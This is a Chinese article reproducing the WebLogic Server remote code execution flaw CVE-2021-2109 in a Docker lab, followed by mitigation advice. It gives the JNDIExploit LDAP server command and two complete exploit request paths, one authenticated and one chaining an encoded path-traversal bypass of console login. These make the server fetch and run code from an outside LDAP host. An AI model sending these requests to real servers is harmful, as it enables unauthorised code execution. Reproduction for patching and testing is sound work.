温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

如何进行Weblogic Server远程代码执行漏洞CVE-2021-2109复现及分析

发布时间:2021-12-28 20:30:10 来源:亿速云 阅读:320 作者:柒染 栏目:安全技术

这期内容当中小编将会给大家带来有关如何进行Weblogic Server远程代码执行漏洞CVE-2021-2109复现及分析,文章内容丰富且以专业的角度为大家分析和叙述,阅读完这篇文章希望大家可以有所收获。

2021年1月Oracle发布了安全更新补丁,包含Oracle产品系列中的329个新安全补丁。此次公告中特别提到了,2020年11月1日发布的Oracle WebLogic Server关于CVE-2020-14750漏洞的安全公告。强烈建议客户应用此补丁更新,及此公告中的其他补丁。CVE编号CVE-2021-2109,该漏洞为Weblogic 的远程代码执行漏洞。漏洞主要由JNDI注入,导致攻击者可利用此漏洞远程代码执行。

影响版本如下:

Weblogic Server 10.3.6.0.0

Weblogic Server 12.1.3.0.0

Weblogic Server 12.2.1.3.0

Weblogic Server 12.2.1.4.0

Weblogic Server 14.1.1.0.0

一、CVE-2021-2109 Weblogic Server远程代码执行漏洞复现

使用DOCKER搭建Weblogic Server测试环境,Weblogic Server可以正常访问

如何进行Weblogic Server远程代码执行漏洞CVE-2021-2109复现及分析

1、正常登录后台的情况下进行JNDI注入

第一种情况,需要利用管理员帐号登录Weblogic Server后台,通过BurpSuite抓取登录数据包,获取登录Cookie数据

如何进行Weblogic Server远程代码执行漏洞CVE-2021-2109复现及分析

在本机启动启动LDAP,可在https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11下载,命令如下:

java -jar JNDIExploit-v1.11.jar -i 192.168.131.1

如何进行Weblogic Server远程代码执行漏洞CVE-2021-2109复现及分析

发送Weblogic Server远程代码执行漏洞CVE-2021-2109 JNDI注入POC数据包:

POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.131;1:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1

如何进行Weblogic Server远程代码执行漏洞CVE-2021-2109复现及分析

通过cmd变量执行ipconfig系统命令

如何进行Weblogic Server远程代码执行漏洞CVE-2021-2109复现及分析

如何进行Weblogic Server远程代码执行漏洞CVE-2021-2109复现及分析

2、配合Weblogic Server未授权访问后台进行JNDI注入

第二种情况,不需要登录Weblogic Server后台。

需配合Weblogic Server CVE-2020-14750未授权访问漏洞,发送Weblogic Server远程代码执行漏洞CVE-2021-2109 JNDI注入POC数据包:

POST /console/css/%25%32%65%25%32%65%25%32%66/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&cqqhandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.131;1:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1

如何进行Weblogic Server远程代码执行漏洞CVE-2021-2109复现及分析

通过cmd变量执行calc.exe,打开系统计算器

如何进行Weblogic Server远程代码执行漏洞CVE-2021-2109复现及分析

如何进行Weblogic Server远程代码执行漏洞CVE-2021-2109复现及分析

二、CVE-2021-2109 Weblogic Server远程代码执行漏洞安全建议

1、禁用T3协议

如果您不依赖T3协议进行JVM通信,可通过暂时阻断T3协议缓解此漏洞带来的影响。

1). 进入Weblogic控制台,在base_domain配置页面中,进入“安全”选项卡页面,点击“筛选器”,配置筛选器。

2). 在连接筛选器中输入:weblogic.security.net.ConnectionFilterImpl,在连接筛选器规则框中输入:* * 7001 deny t3 t3s。

2、禁止启用IIOP

登陆Weblogic控制台,找到启用IIOP选项,取消勾选,重启生效

3、临时关闭后台/console/console.portal对外访问

4、升级官方安全补丁

上述就是小编为大家分享的如何进行Weblogic Server远程代码执行漏洞CVE-2021-2109复现及分析了,如果刚好有类似的疑惑,不妨参照上述分析进行理解。如果想知道更多相关知识,欢迎关注亿速云行业资讯频道。

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI